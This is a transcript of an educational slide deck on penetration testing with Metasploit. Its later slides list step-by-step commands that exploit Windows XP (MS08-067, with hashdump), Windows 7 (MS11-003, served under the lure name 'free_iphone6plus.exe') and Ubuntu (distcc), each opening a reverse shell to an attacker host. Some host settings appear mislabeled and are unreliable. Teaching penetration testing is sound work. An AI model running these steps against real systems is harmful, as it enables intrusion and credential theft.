pen-testing with metasploit

29
Pen-Testing With Metasploit By - Mohammed Danish Amber

Upload: mohammed-danish-amber

Post on 02-Dec-2014

251 views

Category:

Software


3 download

DESCRIPTION

Penetration testing using Metasploit. Windows Xp Windows 7 Linux Server

TRANSCRIPT

Page 1: Pen-Testing with Metasploit

Pen-Testing With Metasploit

By - Mohammed Danish Amber

Page 2: Pen-Testing with Metasploit

AGENDA

▪ Why & What's Pen-Testing

▪ About Metasploit

▪ Metasploit Basic & Meterpreter

▪ Demo

Page 3: Pen-Testing with Metasploit

Mohammed Danish Amber

▪ Geek & Security Analyst

▪ Information Security Enthusiast

▪ Working in TCS

▪ Lecturer & Engineer

▪ Collaborative Project - Hacker Ecosystem

▪ Make Internet a Secure Place

Page 4: Pen-Testing with Metasploit

Why Pen-Testing

▪ Millions of dollars have been invested in security programs to protect critical infrastructure to prevent data breaches

▪ Penetration Test is one of the most effective ways to identify weaknesses and deficiencies in these programs

Page 5: Pen-Testing with Metasploit

What's Pen-Testing

▪ A method to evaluate the security of computer system / network

▪ Practice ( attacking ) an IT System like a ‘hacker’ does– Find security holes (weaknesses)

– Bypass security mechanism

– Compromise an organization’s IT system security

MUST HAVE PERMISSION FROM IT SYSTEM OWNER

ILLEGAL ACTIVITY CAN PUT YOU IN JAIL!

Page 6: Pen-Testing with Metasploit

ETHICS

▪ THINK BEFORE YOU ACT

▪ DON'T BE STUPID

▪ DON'T BE MALICIOUS

Page 7: Pen-Testing with Metasploit

PEN-TESTING PHASES

INFORMATION GATHERING

VULNERABILITY ANALYSIS

EXPLOITATIONPOST

EXPLOITATIONREPORTING

Page 8: Pen-Testing with Metasploit
Page 9: Pen-Testing with Metasploit

Metasploit

▪ Not Just A Tool but an entire framework

▪ An Open Source platform for writing security tools and exploits

▪ Easily build attack vectors to add it's exploits, payloads, encoders.

▪ Create and execute more advanced attack

▪ Ruby based

Page 10: Pen-Testing with Metasploit

Metsaploit Interface

▪ MSFconsole

▪ msfweb, msfgui (discontinued)

▪ Metasploit Pro & Community Edition

▪ Armitage

Page 11: Pen-Testing with Metasploit

MSFconsole

Page 12: Pen-Testing with Metasploit

MSFcli

Page 13: Pen-Testing with Metasploit

Metasploit Terminology

▪ Exploit: Code that allow a pentester take some advantages of a flaw within system,application, or service

▪ Payload: Code that we want the target system to execute (few commands to be executed on the target system)

▪ Shellcode: A set of instructions used as payload when exploitation occurs

▪ Module: A software that can be use by metasploit

▪ Listener: A component waiting for incoming connection

Page 14: Pen-Testing with Metasploit

How does Exploitation works

Att

acke

rSends: Exploit + Payload

Upload + download DATA

Vu

lner

able

Ser

ver

Exploit run + Payload run

Page 15: Pen-Testing with Metasploit

Meterpreter

▪ As a payload after vulnerability is exploited

▪ Improve the post exploitation

Page 16: Pen-Testing with Metasploit

Meterpreter

Exploiting a vulnerability

Select a meterpreter as a payload

Meterpreter shell

Page 17: Pen-Testing with Metasploit

Metereperter Commands

Page 18: Pen-Testing with Metasploit

Metereperter Commands

Page 19: Pen-Testing with Metasploit

Metereperter Commands

Page 20: Pen-Testing with Metasploit

Metereperter Commands

Page 21: Pen-Testing with Metasploit

Metereperter Commands

Page 22: Pen-Testing with Metasploit

Windows XP Exploitation

▪ msf > search windows/smb

▪ msf > info exploit/windows/smb/ms08_067_netapi

▪ msf > use exploit/windows/smb/ms08_067_netapi

▪ msf exploit(ms08_067_netapi) > show payloads

▪ msf exploit(ms08_067_netapi) > set PAYLOAD

▪ windows/meterpreter/reverse_tcp

▪ msf exploit(ms08_067_netapi) > show options

▪ msf exploit(ms08_067_netapi) > set RHOST <remote ip>

▪ msf exploit(ms08_067_netapi) > set LHOST <attacker ip>

▪ msf exploit(ms08_067_netapi) > show options

▪ msf exploit(ms08_067_netapi) > exploit

▪ meterpreter > background

▪ session -l

Page 23: Pen-Testing with Metasploit

Windows XP Exploitation

▪ session -i 1

▪ meterpreter > getsystem -h

▪ getuid

▪ hashdump

Page 24: Pen-Testing with Metasploit

Windows 7 Exploitation

▪ msf > use exploit/windows/browser/ms11_003_ie_css_import

▪ msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp

▪ msf exploit(ms11_003_ie_css_import) > show options

▪ msf exploit(ms11_003_ie_css_import) > set SRVHOST <victim ip>

▪ msf exploit(ms11_003_ie_css_import) > set SRVPORT 80

▪ msf exploit(ms11_003_ie_css_import) > set URIPATH free_iphone6plus.exe

▪ msf exploit(ms11_003_ie_css_import) > set LHOST <victim ip>

▪ msf exploit(ms11_003_ie_css_import) > set LPORT 443

▪ msf exploit(ms11_003_ie_css_import) > exploit

Just wait until the victim open the url http://<victim ip>:80/free_iphon6plus.exe

Page 25: Pen-Testing with Metasploit

Windows 7 Exploitation

▪ msf exploit(ms11_003_ie_css_import) > sessions -l

▪ msf exploit(ms11_003_ie_css_import) > sessions -i 1

▪ meterpreter > sysinfo

▪ meterpreter > shell

Page 26: Pen-Testing with Metasploit

Ubuntu Exploitation

▪ search distcc

▪ use exploit/unix/misc/distcc_exec

▪ show payloads

▪ set PAYLOAD cmd/unix/reverse

▪ show options

▪ set rhost <victim ip>

▪ set lhost <attacker ip>

Page 27: Pen-Testing with Metasploit

Any Questions?

Page 28: Pen-Testing with Metasploit

Thanks To

▪ Kali / BackTrack Linux

▪ Metasploit Team (HD Moore & rapid7)

▪ Offensive Security / Metasploit Unleashed

▪ David Kennedy

▪ Georgia Weidman

▪ Null Hyderabad Chapter - CORE TEAM

▪ #nullhyd @nullhyd

Page 29: Pen-Testing with Metasploit

WWW.MOHAMMEDDANISHAMBER.COM